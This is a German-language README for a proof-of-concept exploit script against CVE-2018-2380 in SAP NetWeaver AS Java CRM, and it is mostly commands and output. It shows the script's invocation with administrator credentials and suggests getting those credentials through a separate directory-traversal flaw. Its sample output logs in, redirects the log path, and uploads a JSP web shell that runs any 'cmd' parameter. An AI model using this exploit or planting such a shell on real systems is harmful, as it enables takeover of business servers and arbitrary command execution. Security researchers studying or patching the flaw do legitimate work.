
PoC von Remote Command Execution via Log-Injection auf SAP NetWeaver AS JAVA CRM
PoC der Remote-Befehlsausführung durch Log-Injection auf SAP NetWeaver AS JAVA CRM Skriptnutzungsbeispiel
python crm_rce-CVE-2018-2380.py --host 127.0.0.1 --port 50001 --username administrator --password 123QWEasd --SID DM0 --ssl true
Wo --host ist eine SAP-Server-IP --port SAP NetWeaver AS Java Port Benutzername und Passwort des SAP-Administrators, die Sie mit der SAP Redwood Directory Traversal-Schwachstelle erhalten können.
Beispiel für die Skriptausgabe
C:\exploits\SAP>crm_rce-CVE-2018-2380.py --host 127.0.0.1 --port 50001 --username administrator --password 123QWEasd --SID DM0 --ssl true
_______ _______ _______ _______ _______ _______ _
( ____ \( ____ )( ____ )( ____ \( ____ \( ___ )( ( /|
| ( \/| ( )|| ( )|| ( \/| ( \/| ( ) || \ ( |
| (__ | (____)|| (____)|| (_____ | | | (___) || \ | |
| __) | __)| _____)(_____ )| | | ___ || (\ \) |
| ( | (\ ( | ( ) || | | ( ) || | \ |
| (____/\| ) \ \__| ) /\____) || (____/\| ) ( || ) \ |
(_______/|/ \__/|/ \_______)(_______/|/ \||/ )_)
Vahagn @vah_13 Vardanian
Bob @NewFranny
Mathieu @gelim
CVE-2018-2380
[!] Versuche RCE mittels Log-Injection zu erreichen
[!] Hole j_salt-Token für Anfragen
[!] Am SAP-Portal anmelden
[!] Log-Pfad ändern
[!] "Runtime.getRuntime().exec(request.getParameter("cmd"))" Shell hochladen auf https://127.0.0.1:50001/ERPScan_shell_31275.0.jsp?cmd=ipconfig
[!] Log-Pfad auf ./default_log_name.log zurücksetzen
[!] Viel Spaß!
C:\exploits\SAP>